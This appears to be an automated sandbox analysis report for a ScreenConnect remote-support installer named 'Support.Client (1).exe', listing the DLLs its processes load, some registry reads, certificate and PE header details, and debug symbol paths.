Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Section loaded: wkscli.dll

Source: C:\Users\user\Desktop\Support.Client (1).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: Support.Client (1).exe

Static PE information: certificate valid

PE file contains a mix of data directories often seen in goodware

Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Support.Client (1).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Support.Client (1).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: Support.Client (1).exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: Support.Client (1).exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA938000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAB2C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1964904013.0000000000D02000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.2932709226.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024038339.0000000000BC0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.2024331738.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1953021568.0000000000D7D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA944000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbS] source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA944000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA5CE000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1970874723.000000001B382000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA5C6000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADAADB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2526431199.000002CADA93C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1969141037.000000001AC22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbu source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
